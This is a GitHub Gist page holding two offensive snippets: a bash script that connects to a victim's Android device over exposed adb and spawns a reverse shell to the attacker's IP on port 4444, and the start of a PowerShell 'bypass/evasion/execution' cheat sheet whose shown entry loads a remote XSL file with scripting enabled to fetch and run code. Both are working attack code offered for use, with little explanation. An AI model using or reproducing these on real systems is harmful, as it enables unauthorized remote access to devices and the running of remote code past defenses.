Skip to content

Instantly share code, notes, and snippets.

@seccybpre
seccybpre / android-sehll.sh
Created March 30, 2021 08:09
[Android shell] #android
#!/bin/bash
# Simple reverse shell on android using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# ./android-shell.sh victimip yourip
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"
@seccybpre
seccybpre / PowerShell.txt
Last active December 30, 2020 09:55 — forked from mgeeky/PowerShell.txt
[Bypass/Evasion/Execution] Snippets of PowerShell bypass/evasion/execution techniques that are interesting #powershell #windows #evasion
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.github.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.github.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;
##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]